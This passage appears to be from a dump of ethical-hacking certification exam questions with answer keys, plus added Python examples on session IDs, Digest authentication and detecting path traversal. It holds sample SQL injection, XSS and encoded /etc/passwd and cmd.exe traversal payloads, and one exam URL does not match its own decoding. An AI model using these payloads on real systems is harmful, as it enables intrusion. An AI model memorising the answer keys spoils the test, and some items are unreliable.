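The window arithmetic is worth having as code, because a real implementation also has to survive the 32-bit wraparound of the sequence space. The following is an added example (not part of the exam dump) that computes the accepted range as RFC 793 defines it and tests a candidate number against it modulo 2^32; the blind-guessing helper, with its step and count, is an illustration assumed for the demo, not a method the question describes.

```python
# Added example for Q257: compute the sequence numbers a TCP receiver will
# accept, as RFC 793 defines it (RCV.NXT through RCV.NXT + RCV.WND - 1), with
# the 32-bit wraparound that real stacks must handle. Not part of the exam dump.
SEQ_MOD = 2 ** 32


def acceptable_seq_range(last_received, receive_window):
    """Inclusive (first, last) sequence number the receiver accepts next.

    The exam treats the units as packets; in real TCP both arguments are bytes.
    The receiver's own window is what matters, not the sender's.
    """
    first = (last_received + 1) % SEQ_MOD
    last = (last_received + receive_window) % SEQ_MOD
    return first, last


def seq_in_window(seq, last_received, receive_window):
    """True if seq falls inside the window, correct across the 2**32 wrap."""
    offset = (seq - last_received - 1) % SEQ_MOD   # distance past RCV.NXT
    return offset < receive_window


def hijack_candidates(last_received, receive_window, guess_step=1000, max_guesses=8):
    """Sequence numbers a blind attacker guessing in fixed steps would try,
    filtered to those the receiver would actually accept. The step and count
    are demo assumptions, not parameters from the exam question."""
    guesses = [(last_received + 1 + k * guess_step) % SEQ_MOD for k in range(max_guesses)]
    return [g for g in guesses if seq_in_window(g, last_received, receive_window)]


if __name__ == "__main__":
    print(acceptable_seq_range(120, 250))          # (121, 370); the exam key says 121-371
    print(acceptable_seq_range(2 ** 32 - 10, 100))  # wraps: (4294967287, 90)
```

The modular subtraction in seq_in_window is the whole trick: comparing raw integers would reject every in-window number that has wrapped past zero.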
QUESTION 258:
How would you prevent session hijacking attacks?
A. Using biometrics access tokens secures sessions against hijacking
B. Using non-Internet protocols like http secures sessions against hijacking
C. Using hardware-based authentication secures sessions against hijacking
D. Using unpredictable sequence numbers secures sessions against hijacking
Answer: D
Explanation: Whether the session is a raw TCP connection or a web application login, what keeps an attacker out is that the value identifying the session cannot be guessed. For TCP that value is the sequence number: if initial sequence numbers are predictable, an attacker who cannot sniff the traffic can still inject segments that the receiver accepts (the defence is randomized ISNs, as described in RFC 6528). For web applications it is the session ID: if the session management system issues IDs in a predictable sequence, hijacking another user's session is trivial, so IDs must come from a cryptographically secure random source and be long enough that guessing is infeasible. Hardware tokens and biometrics only strengthen the login; they do nothing for the connection once it is established.
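The web-application half of that point is easiest to see with a bad generator beside a good one. The following is an added example (not part of the exam dump): a deliberately weak counter-based session ID scheme, the two-sample prediction that defeats it, a CSPRNG-based replacement, and a rough measure of how many guesses a brute-force attacker needs against each ID space. The weak scheme and its parameters are invented for the demo.

```python
# Added example for Q258: a predictable session ID scheme beside an
# unpredictable one. An attacker who collects a few IDs from the weak scheme
# computes the next one and hijacks whoever logs in next. Not part of the exam
# dump; the weak scheme is a deliberately bad illustration.
import math
import secrets


class WeakSessionIds:
    """Counter-based IDs (deliberately weak): each ID is the last one plus a fixed step."""

    def __init__(self, start=1000, step=7):
        self._n = start
        self._step = step

    def issue(self):
        self._n += self._step
        return f"{self._n:012d}"


def predict_next_weak(observed):
    """From two consecutive weak IDs, derive the step and guess the next one."""
    a, b = int(observed[-2]), int(observed[-1])
    return f"{b + (b - a):012d}"


def issue_strong(nbytes=32):
    """256 bits from the OS CSPRNG, URL-safe; there is no pattern to extrapolate."""
    return secrets.token_urlsafe(nbytes)


def guessing_cost_bits(id_space_size, live_sessions):
    """log2 of the guesses needed to hit any one live session by brute force.

    The weak scheme's 12 decimal digits give 10**12 IDs; the strong one 2**256.
    Prediction beats brute force for the weak scheme anyway, so this number is
    the best case for the defender, not the attacker's real cost.
    """
    return math.log2(id_space_size / max(live_sessions, 1))


if __name__ == "__main__":
    gen = WeakSessionIds()
    seen = [gen.issue() for _ in range(3)]
    print("predicted", predict_next_weak(seen), "actual", gen.issue())
    print("strong", issue_strong())
```

Length alone is not the fix: a 12-digit ID has a trillion values but falls to two observations, while the strong ID is safe only because nothing about it is derivable from earlier ones.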
QUESTION 259:
Which of the following attacks takes best advantage of an existing authenticated connection?
A. Spoofing
B. Session Hijacking
C. Password Sniffing
D. Password Guessing
Answer: B
Explanation: Session hijacking is the act of taking control of a user session after successfully obtaining or generating an authentication session ID. Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress.
QUESTION 260:
Certkiller is making use of Digest Authentication for her Web site. Why is this considered to be more secure than Basic authentication?
A. Basic authentication is broken
B. The password is never sent in clear text over the network
C. The password sent in clear text over the network is never reused.
D. It is based on Kerberos authentication protocol
Answer: B
Explanation: Digest access authentication is one of the agreed methods a web page can use to negotiate credentials with a web user over HTTP. It is the alternative to the Basic scheme, in which the password is merely base64-encoded and recoverable by anyone who sees the header. Digest establishes the user's identity without sending the password in plaintext: the client sends an MD5 hash computed over the password, the realm, a server-supplied nonce and the request, which the server can verify without ever receiving the password itself. It still sends the hash in the clear and offers no server authentication, so it is not a substitute for TLS.
QUESTION 261:
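The difference is concrete once both headers are built by hand. The following is an added example (not part of the exam dump) that produces a Basic header and recovers the password from it, computes the RFC 2617 Digest response from the stored HA1, and verifies it server-side; the credentials and nonce values are the worked example from RFC 2617 section 3.5, and the comparison uses a constant-time check.

```python
# Added example for Q260: what travels on the wire under Basic versus Digest
# authentication. Basic is only base64, reversible by anyone who sees it;
# Digest sends an MD5 over password, realm, nonce and request, which a server
# holding only HA1 can verify. The test vector is the worked example in
# RFC 2617 section 3.5. Not part of the exam dump.
import base64
import hashlib
import hmac


def _md5(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def basic_authorization(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def basic_recover_credentials(header):
    """Anyone sniffing the header gets the password back with one decode."""
    return base64.b64decode(header.split(" ", 1)[1]).decode()


def digest_ha1(user, realm, password):
    """The only thing a Digest server needs to store per user."""
    return _md5(f"{user}:{realm}:{password}")


def digest_response(ha1, method, uri, nonce, nc=None, cnonce=None, qop=None):
    """RFC 2617 response; with qop='auth' the client nonce and count are mixed in."""
    ha2 = _md5(f"{method}:{uri}")
    if qop:
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")   # RFC 2069 compatibility form, no qop


def digest_verify(stored_ha1, claimed, method, uri, nonce, nc=None, cnonce=None, qop=None):
    """Server side: recompute from HA1 and compare in constant time.

    The password never crosses the wire; a replay is blocked by the server
    refusing to accept the same nonce/nc pair twice (tracking not shown here).
    """
    expected = digest_response(stored_ha1, method, uri, nonce, nc, cnonce, qop)
    return hmac.compare_digest(expected, claimed)


# Worked example from RFC 2617 section 3.5.
RFC2617_EXAMPLE = {
    "user": "Mufasa", "realm": "testrealm@host.com", "password": "Circle Of Life",
    "method": "GET", "uri": "/dir/index.html",
    "nonce": "dcd98b7102dd2f0e8b11d0f600bfb0c093",
    "nc": "00000001", "cnonce": "0a4f113b", "qop": "auth",
}

if __name__ == "__main__":
    e = RFC2617_EXAMPLE
    print(basic_authorization(e["user"], e["password"]))
    ha1 = digest_ha1(e["user"], e["realm"], e["password"])
    print(digest_response(ha1, e["method"], e["uri"], e["nonce"], e["nc"], e["cnonce"], e["qop"]))
```

What the server stores (HA1) is itself password-equivalent for that realm, and the response can be attacked offline by anyone who captures it, which is why Digest over plain HTTP only raises the bar rather than removing the risk.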
You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 Server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permission. You need to know what your current privileges are within the shell. Which of the following options would be your current privileges?
A. Administrator
B. IUSR_COMPUTERNAME
C. LOCAL_SYSTEM
D. Whatever account IIS was installed with
Answer: C
Explanation: On a default IIS installation the web server runs under the local system account (the exam's LOCAL_SYSTEM, shown in Windows as NT AUTHORITY\SYSTEM), so a shell spawned from the overflowed process inherits those privileges. That account already has full control of the host, so no further elevation is needed.
QUESTION 262:
You wish to determine the operating system and type of web server being used. At the same time you wish to arouse no suspicion within the target organization.
While some of the methods listed below work, which holds the least risk of detection?
A. Make some phone calls and attempt to retrieve the information using social engineering.
B. Use nmap in paranoid mode and scan the web server.
C. Telnet to the web server and issue commands to elicit a response.
D. Use the netcraft web site look for the target organization's web site.

Answer: D
Explanation: Netcraft provides research data and analysis on many aspects of the Internet. Netcraft has explored the Internet since 1995 and is a respected authority on the market share of web servers, operating systems, hosting providers, ISPs, encrypted transactions, electronic commerce, scripting languages and content technologies on the Internet. Querying Netcraft's records sends no traffic to the target at all, which is why it carries the least risk of detection.
QUESTION 263:
Bart is looking for a Windows NT/2000/XP command-line tool that can be used to assign, display, or modify ACL's (access control lists) to files or folders and also one that can be used within batch files.
Which of the following tools can be used for that purpose? (Choose the best answer)
A. PERM.exe
B. CACLS.exe
C. CLACS.exe
D. NTPERM.exe
Answer: B
Explanation: Cacls.exe is a Windows NT/2000/XP command-line tool you can use to assign, display, or modify ACLs (access control lists) on files or folders. Cacls is an interactive tool, and since it is a command-line utility, you can also use it in batch files.
QUESTION 264:
Which of the following buffer overflow exploits are related to Microsoft IIS web server? (Choose three)
A. Internet Printing Protocol (IPP) buffer overflow
B. Code Red Worm
C. Indexing services ISAPI extension buffer overflow
D. NeXT buffer overflow
Answer: A, B, C
Explanation: The Internet Printing Protocol (IPP) ISAPI extension overflow is described in Microsoft Security Bulletin MS01-023, and the Indexing Service ISAPI extension (idq.dll) overflow in MS01-033. The Code Red worm, released on the Internet on July 13, 2001, exploited the MS01-033 flaw to attack computers running Microsoft's IIS web server.
QUESTION 265:

On a default installation of Microsoft IIS web server, under which privilege does the web server software execute?
A. Everyone
B. Guest
C. System
D. Administrator
Answer: C
Explanation: Unless changed during installation, IIS executes as the Local System account, with far higher privileges than a web server needs.
QUESTION 266:
You are gathering competitive intelligence on Certkiller.com. You notice that they have jobs listed on a few Internet job-hunting sites. There are two job postings for network and system administrators. How can this help you in footprinting the organization?
A. The IP range used by the target network
B. An understanding of the number of employees in the company
C. How strong the corporate security policy is
D. The types of operating systems and applications being used.
Answer: D
Explanation:
From job posting descriptions one can see which is the set of skills, technical knowledge, system experience required, hence it is possible to argue what kind of operating systems and applications the target organization is using.
QUESTION 267:
What are the three phases involved in security testing?
A. Reconnaissance, Conduct, Report
B. Reconnaissance, Scanning, Conclusion
C. Preparation, Conduct, Conclusion
D. Preparation, Conduct, Billing
Answer: C
Explanation:
Preparation phase - A formal contract is executed containing non-disclosure of the client's data and legal protection for the tester. At a minimum, it also lists the IP addresses to be tested and the time to test.
Conduct phase - In this phase the penetration test is executed, with the tester looking for potential vulnerabilities.
Conclusion phase - The results of the evaluation are communicated to the pre-defined organizational contact, and corrective action is advised.
QUESTION 268:
You visit a website to retrieve the listing of a company's staff members. But you can not find it on the website. You know the listing was certainly present one year before. How can you retrieve information from the outdated website?
A. Through Google searching cached files
B. Through Archive.org
C. Download the website and crawl it
D. Visit customers' and partners' websites
Answer: B
Explanation: Archive.org mirrors websites and indexes the snapshots by crawl date, with archives dating back to 1996. Google is incorrect because its cache is only as recent as the latest crawl and is overwritten on each subsequent crawl. Downloading the website is incorrect because that yields the same content you see online. Visiting customers' and partners' websites is simply irrelevant. The answer is therefore B, archive.org.
QUESTION 269:
You work as security technician at Certkiller.com. While doing web application testing, you might be required to look through multiple web pages online which can take a long time. Which of the processes listed below would be a more efficient way of doing this type of validation?
A. Use mget to download all pages locally for further inspection.
B. Use wget to download all pages locally for further inspection.
C. Use get* to download all pages locally for further inspection.
D. Use get() to download all pages locally for further inspection.
Answer: B
Explanation:
Wget is a utility used for mirroring websites. get* does not work: for the FTP command to apply to every file there must be a space between get and * (i.e. get *). get() is bogus; it is a C-style function call written incorrectly. mget is a command used from within ftp itself, which rules out A. That leaves B, wget, which is designed for mirroring and downloading files, especially web pages; used with the recursive option (e.g. wget -r www.Certkiller.com, or wget -m for a full mirror) it retrieves a site, except for protected portions of course. Note that -R in wget is the reject-pattern option, not the recursive one.
Note: GNU Wget is a free network utility to retrieve files from the World Wide Web using HTTP and FTP and can be used to make mirrors of archives and home pages, thus enabling work in the background after having logged off.
QUESTION 270:
000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^......^...E.
010 05 DC 1D E4 40 00 7F 06 C2 6D 0A 00 00 02 0A 00 ....@....m......
020 01 C9 00 50 07 75 05 D0 00 C0 04 AE 7D F5 50 10 ...P.u......}.P.
030 70 79 8F 27 00 00 48 54 54 50 2F 31 2E 31 20 32 py.'..HTTP/1.1.2
040 30 30 20 4F 4B 0D 0A 56 69 61 3A 20 31 2E 30 20 00.OK..Via:.1.0.
050 53 54 52 49 44 45 52 0D 0A 50 72 6F 78 79 2D 43 STRIDER..Proxy-C
060 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D onnection:.Keep-
070 41 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 4C Alive..Content-L
080 65 6E 67 74 68 3A 20 32 39 36 37 34 0D 0A 43 6F ength:.29674..Co
090 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 ntent-Type:.text
0A0 2F 68 74 6D 6C 0D 0A 53 65 72 76 65 72 3A 20 4D /html..Server:.M
0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 ..Microsoft
0C0 0D 0A 44 61 74 65 3A 20 53 75 6E 2C 20 32 35 20 ..Date:.Sun,.25.
0D0 4A 75 6C 20 31 39 39 39 20 32 31 3A 34 35 3A 35 Jul.1999.21:45:5
0E0 31 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 61 1.GMT..Accept-Ra
0F0 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 4C 61 73 nges:.bytes..Las
100 74 2D 4D 6F 64 69 66 69 65 64 3A 20 4D 6F 6E 2C t-Modified:.Mon,
110 20 31 39 20 4A 75 6C 20 31 39 39 39 20 30 37 3A .19.Jul.1999.07:
120 33 39 3A 32 36 20 47 4D 54 0D 0A 45 54 61 67 3A 39:26.GMT..ETag:
130 20 22 30 38 62 37 38 64 33 62 39 64 31 62 65 31 ."08b78d3b9d1be1
140 3A 61 34 61 22 0D 0A 0D 0A 3C 74 69 74 6C 65 3E :a4a"....<title>
150 53 6E 69 66 66 69 6E 67 20 28 6E 65 74 77 6F 72 Sniffing.(networ
160 6B 20 77 69 72 65 74 61 70 2C 20 73 6E 69 66 66 k.wiretap,.sniff
170 65 72 29 20 46 41 51 3C 2F 74 69 74 6C 65 3E 0D er).FAQ</title>.
180 0A 0D 0A 3C 68 31 3E 53 6E 69 66 66 69 6E 67 20 ...<h1>Sniffing.
190 28 6E 65 74 77 6F 72 6B 20 77 69 72 65 74 61 70 (network.wiretap
1A0 2C 20 73 6E 69 66 66 65 72 29 20 46 41 51 3C 2F ,.sniffer).FAQ</
1B0 (hex bytes missing from this copy of the dump) ....This.docu
1C0 6D 65 6E 74 20 61 6E 73 77 65 72 73 20 71 75 65 ment.answers.que
1D0 73 74 69 6F 6E 73 20 61 62 6F 75 74 20 74 61 70 stions.about.tap
1E0 70 69 6E 67 20 69 6E 74 6F 20 0D 0A 63 6F 6D 70 ping.into...comp
1F0 75 74 65 72 20 6E 65 74 77 6F 72 6B 73 20 61 6E uter.networks.an
This packet was taken from a packet sniffer that monitors a Web server.
This packet was originally 1514 bytes long, but only the first 512 bytes are shown here. This is the standard hexdump representation of a network packet, before being decoded. A hexdump has three columns: the offset of each line, the hexadecimal data, and the ASCII equivalent. This packet contains a 14-byte Ethernet header, a 20-byte IP header, a 20-byte TCP header, an HTTP header ending in two CRLF sequences (0D 0A 0D 0A) and then the data. By examining the packet, identify the name and version of the Web server.
A. Apache 1.2
B. IIS 4.0
C. IIS 5.0
D. Linux WServer 2.3
Answer: B
Explanation:
We see that the server is Microsoft, but the exam designer did not want to make it easy for you, so the ASCII column for IIS/4.0 has been blanked out. The key is in line "0B0":
0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 ..Microsoft
49 is I, so we get I
49 again, so we get II
53 is S, so we get IIS
2F is /, the separator between product and version
34 is 4
2E is .
30 is 0
So we get IIS/4.0
The answer is B
If you do not remember the ASCII table, there are enough characters already decoded elsewhere in the dump to work from. For example, line "050" has STRIDER, which is 53 54 52 49 44 45 52, and that gives you the conversions for "S" (53) and "I" (49).
QUESTION 271:
This kind of attack will let you assume a user's identity at a dynamically generated web page or site:
A. SQL Injection
B. Cross Site Scripting
C. Session Hijacking
D. Zone Transfer
Answer: B
Explanation: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allows code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

QUESTION 272:
____________ will let you assume a user's identity at a dynamically generated web page or site.
A. SQL attack
B. Injection attack
C. Cross site scripting
D. The shell attack
E. Winzapper
Answer: C
Explanation: Cross site scripting is also referred to as XSS (and, in older material, CSS). For a reflected attack the user must be online and must be tricked into clicking a link that you have sent in order for the attack to work.
QUESTION 273:
What is Form Scalpel used for?
A. Dissecting HTML Forms
B. Dissecting SQL Forms
C. Analysis of Access Database Forms
D. Troubleshooting Netscape Navigator
E. Quatro Pro Analysis Tool
Answer: A
Explanation: Form Scalpel automatically extracts forms from a given web page and splits up all fields for editing and manipulation.
QUESTION 274:
Bubba has just accessed his preferred ecommerce web site and has spotted an item that he would like to buy. Bubba considers the price a bit too steep. He looks at the source code of the webpage and decides to save the page locally, so that he can modify the page variables. In the context of web application security, what do you think Bubba has changed?
A. A hidden form field value.
B. A hidden price value.
C. An integer variable.
D. A page cannot be changed locally, as it is served by a web server.
Answer: A
QUESTION 275:
Take a look at the following attack on a Web Server using an obfuscated URL: http://www.example.com/script.ext?template%2e%2e%2e%2e%2e%2f%2e%2f%65%74%63 The request is made up of:
1. %2e%2e%2f%2e%2e%2f%2e%2e%2f = ../../../
2. %65%74%63 = etc
3. %2f = /
4. %70%61%73%73%77%64 = passwd
How would you protect information systems from these attacks?
A. Configure Web Server to deny requests involving Unicode characters.
B. Create rules in IDS to alert on strange Unicode requests.
C. Use SSL authentication on Web Servers.
D. Enable Active Scripts Detection at the firewall and routers.
Answer: B
Explanation:
The request is a percent-encoded directory traversal (the exam calls this a Unicode attack): once the server decodes it, the path becomes ../../../etc/passwd. Per the answer key, configuring the IDS to alert on such encoded requests protects the web server by making the attempts visible. In practice an alert on its own stops nothing; the server must fully decode and canonicalize the path before checking that the target lies inside the web root, and the IDS must apply the same decoding or the encoding evades it.
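Added example (not from the exam): a Python canonicalizer and detector for percent-encoded and overlong-UTF-8 traversal, the class of request shown in the question. The sample requests are constructed for illustration; the overlong %c0%af and double-encoded %255c forms are the patterns associated with the IIS canonicalization bugs mentioned later in this dump. The point the explanation leaves out is that detection only helps if the server also decodes fully before it checks the path, so the same decode-then-resolve routine is used for both the IDS-style check and the server-side mapping.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample requests: two benign, one percent-encoded traversal in a
# parameter (as in the question), one overlong-UTF-8 form (%c0%af decodes to '/'
# in a lenient parser), one double-encoded backslash (%255c -> %5c -> '\').
SAMPLE_REQUESTS = [
    "/index.html",
    "/images/../style.css",
    "/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64",
    "/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir",
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir",
]

def fold_overlong_utf8(raw):
    """Mimic a lenient decoder: accept C0/C1 xx as the ASCII byte it encodes.
    Strict UTF-8 rejects these sequences; decoders that accepted them made the attack."""
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return bytes(out)

def decode_layers(raw, max_rounds=3):
    """Percent-decode repeatedly (double encoding), fold overlong forms, unify slashes."""
    cur = raw
    for _ in range(max_rounds):
        nxt = fold_overlong_utf8(unquote_to_bytes(cur))
        if nxt == cur:
            break
        cur = nxt
    return cur.replace(b"\\", b"/").decode("latin-1")

def resolve(path):
    """Resolve '.' and '..' segments. Returns (resolved, escaped); escaped is True
    when '..' tried to climb above the root, which posixpath.normpath() would hide."""
    stack, escaped = [], False
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escaped

def analyse(request):
    """IDS-style pass over one request line: report each component that escapes the root."""
    path, _, query = request.partition("?")
    parts = [("path", path)]
    for pair in (query.split("&") if query else []):
        name, _, value = pair.partition("=")
        parts.append(("param " + name, value))
    findings = []
    for where, raw in parts:
        decoded = decode_layers(raw.encode("latin-1"))
        resolved, escaped = resolve(decoded)
        if escaped:
            findings.append({"where": where, "decoded": decoded, "resolved": resolved})
    return findings

def map_to_root(web_root, requested_path):
    """Server-side check: canonicalize first, then refuse anything that climbed out."""
    resolved, escaped = resolve(decode_layers(requested_path.encode("latin-1")))
    return None if escaped else web_root.rstrip("/") + resolved

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req, "->", analyse(req) or "clean")
```

The segment stack deliberately does not follow symlinks; when the result is used to open a file, resolve it with os.path.realpath and check the web-root prefix once more.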
QUESTION 276:
An attacker has been successfully modifying the purchase price of items purchased at a web site. The security administrators verify the web server and Oracle database have not been compromised directly. They have also verified the IDS logs and found no attacks that could have caused this. What is the mostly likely way the attacker has been able to modify the price?
A. By using SQL injection
B. By using cross site scripting
C. By changing hidden form values in a local copy of the web page
D. There is no way the attacker could do this without directly compromising either the web server or the database
Answer: C
Explanation: Changing hidden form values is possible when a web site is poorly built and trusts the visitor's computer to submit vital data, such as the price of a product, to the database.
QUESTION 277:
Dan is conducting a penetration test and has found a vulnerability in a Web Application which gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well. Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session?
A. Dan cannot spoof his IP address over TCP network
B. The server will send replies back to the spoofed IP address
C. Dan can establish an interactive session only if he uses a NAT
D. The scenario is incorrect as Dan can spoof his IP and get responses
Answer: B
Explanation: Spoofing your IP address is only effective when there is no need to establish a two-way connection, because all traffic meant for the attacker ends up at the spoofed address instead.
QUESTION 278:
What are the differences between SSL and S-HTTP?
A. SSL operates at the network layer and S-HTTP operates at the application layer
B. SSL operates at the application layer and S-HTTP operates at the network layer
C. SSL operates at the transport layer and S-HTTP operates at the application layer
D. SSL operates at the application layer and S-HTTP operates at the transport layer
Answer: C
Explanation: The main difference between the protocols is the layer at which they operate. SSL operates at the transport layer and mimics the "socket library," while
S-HTTP operates at the application layer. Encryption of the transport layer allows
SSL to be application-independent, while S-HTTP is limited to the specific software implementing it. The protocols adopt different philosophies towards encryption as well, with SSL encrypting the entire communications channel and S-HTTP encrypting each message independently.
QUESTION 279:
Kevin sends an email invite to Chris to visit a forum for security professionals.
Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack?
A. Phishing
B. Denial of Service
C. Cross Site Scripting
D. Backdoor installation
Answer: C
Explanation: This is a typical Type-1 Cross Site Scripting attack. This kind of cross-site scripting hole is also referred to as a non-persistent or reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, client-side code can be injected into the dynamic page. A classic example is a site search engine: if one searches for a string which includes some HTML special characters, the search string is often redisplayed on the result page to indicate what was searched for, or at least placed in the text box for easier editing. If every occurrence of the search terms is not HTML entity encoded, an XSS hole results.
QUESTION 280:
Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn an interactive shell and plans to deface the main web page. He first attempts to use the "echo" command simply to overwrite index.html and is unsuccessful. He then attempts to delete the page and makes no progress. Finally, he tries to overwrite it with another page, in which he also fails. What is the probable cause of Bill's problem?
A. You cannot use a buffer overflow to deface a web page
B. There is a problem with the shell and he needs to run the attack again
C. The HTML file has permissions of read only
D. The system is a honeypot
Answer: C
QUESTION 281:
Which of the following statements best describes the term Vulnerability?
A. A weakness or error that can lead to a compromise
B. An agent that has the potential to take advantage of a weakness
C. An action or event that might prejudice security
D. The loss potential of a threat.
Answer: A


Explanation: Vulnerabilities are all weaknesses that can be exploited.
QUESTION 282:
Bob is a very security conscious computer user. He plans to test a site that is known to have malicious applets, code, and more. Bob always makes use of a basic Web Browser to perform such testing.
Which of the following web browsers can adequately fill this purpose?
A. Internet Explorer
B. Mozilla
C. Lynx
D. Tiger
Answer: C
Explanation: Lynx is a program used to browse the World Wide Web, which works on simple text terminals, rather than requiring a graphical computer display terminal.
QUESTION 283:
Clive has been hired to perform a Black-Box test by one of his clients.
How much information will Clive obtain from the client before commencing his test?
A. IP Range, OS, and patches installed.
B. Only the IP address range.
C. Nothing but corporate name.
D. All that is available from the client site.
Answer: C
Explanation: Penetration tests can be conducted in one of two ways: black-box (with no prior knowledge of the infrastructure to be tested) or white-box (with complete knowledge of the infrastructure to be tested). As you might expect, there are conflicting opinions about this choice and the value that either approach will bring to a project.
QUESTION 284:
Scanning for services is an easy job for Bob as there are so many tools available from the Internet. In order for him to check the vulnerability of Certkiller, he went through a few scanners that are currently available. Here are the scanners that he uses:
1. Axent's NetRecon (http://www.axent.com)
2. SARA, by Advanced Research Organization (http://www-arc.com/sara)
3. VLAD the Scanner, by Razor (http://razor.bindview.com/tools/)
However, there are many other alternative ways to make sure that the services that have been scanned will be more accurate and detailed for Bob.
What would be the best method to accurately identify the services running on a victim host?
A. Using Cheops-ng to identify the devices of Certkiller.
B. Using the manual method of telnet to each of the open ports of Certkiller.
C. Using a vulnerability scanner to try to probe each port to verify or figure out which service is running for Certkiller.
D. Using the default port and OS to make a best guess of what services are running on each port for Certkiller.
Answer: B
Explanation: By connecting to each open port with telnet you receive the banners that tell you which service is answering on that specific port.
QUESTION 285:
Jim was having no luck performing a penetration test on his company's network. He was running the test from home and had downloaded every security scanner he could lay his hands on. Despite knowing the IP range of all of the systems and the exact network configuration, Jim was unable to get any useful results. Why is Jim having these problems?
A. Security scanners can't perform vulnerability linkage
B. Security Scanners are not designed to do testing through a firewall
C. Security Scanners are only as smart as their database and can't find unpublished vulnerabilities
D. All of the above
Answer: D
Explanation: Security scanners are designed to find vulnerabilities, not to exploit them, and they only find well-known vulnerabilities, never zero-day ones. A scanner alone therefore does not make a penetration test; a more capable toolset is needed.
QUESTION 286:
You have just received an assignment for an assessment at a company site. The company's management is concerned about external threats and wants to take appropriate steps to ensure security is in place. However, management is also worried about possible threats coming from inside the site, specifically from employees belonging to different departments. What kind of assessment will you be performing?
A. Black box testing
B. Black hat testing
C. Gray box testing
D. Gray hat testing
E. White box testing
F. White hat testing
Answer: C
Internal Testing is also referred to as Gray-box testing.
QUESTION 287:
What does black box testing mean?
A. You have full knowledge of the environment
B. You have no knowledge of the environment
C. You have partial knowledge of the environment
Answer: B
Explanation:
Black box testing is conducted when you have no knowledge of the environment. It is more time consuming and expensive.
QUESTION 288:
Bryan notices the error on the web page and asks Liza to enter liza' or '1'='1 in the email field. They are greeted with a message "Your login information has been mailed to johndoe@gmail.com". What do you think has occurred?
A. The web application picked up a record at random
B. The web application returned the first record it found
C. The server error has caused the application to malfunction
D. The web application emailed the administrator about the error
Answer: B
Explanation: The web application builds an SQL query from the input. With the added condition '1'='1', which is always true, the WHERE clause matches every row, and the application uses the first one it gets back.
QUESTION 289:
Bret is a web application administrator and has just read that there are a number of surprisingly common web application vulnerabilities that can be exploited by unsophisticated attackers with easily available tools on the Internet.
He has also read that when an organization deploys a web application, they invite the world to send HTTP requests. Attacks buried in these requests sail past firewalls, filters, platform hardening, SSL, and IDS without notice because they are inside legal HTTP requests. Bret is determined to weed out any vulnerabilities.
What are some common vulnerabilities in web applications that he should be concerned about?
A. Non-validated parameters, broken access control, broken account and session management, cross-site scripting and buffer overflows are just a few common vulnerabilities
B. No IDS configured, anonymous user account set as default, missing latest security patch, no firewall filters set and visible clear text passwords are just a few common vulnerabilities
C. Visible clear text passwords, anonymous user account set as default, missing latest security patch, no firewall filters set and no SSL configured are just a few common vulnerabilities
D. No SSL configured, anonymous user account set as default, missing latest security patch, no firewall filters set and an inattentive system administrator are just a few common vulnerabilities
Answer: A
QUESTION 290:
Liza has forgotten her password to an online bookstore. The web application asks her to key in her email so that they can send her the password. Liza enters her email liza@yahoo.com'. The application displays server error. What is wrong with the web application?
A. The email is not valid
B. User input is not sanitized
C. The web server may be down
D. The ISP connection is not reliable
Answer: B
Explanation: All input from web browsers, such as user data from HTML forms and cookies, must be sanitized before use, with special characters and HTML tags stripped or encoded as described in the following CERT advisories: http://www.cert.org/advisories/CA-1997-25.html http://www.cert.org/advisories/CA-2000-02.html For SQL the reliable fix is to pass input to the database as bound parameters rather than splicing it into the query text.
QUESTION 291:

Actualtests.com - The Power of Knowing

312-50
While testing web applications, you attempt to insert the following test script into the search area on the company's web site: <script>alert('Testing Testing Testing')</script>
Afterwards, when you press the search button, a pop up box appears on your screen with the text "Testing Testing Testing". What vulnerability is detected in the web application here?
A. A hybrid attack
B. A buffer overflow
C. Password attacks
D. Cross Site Scripting
Answer: D
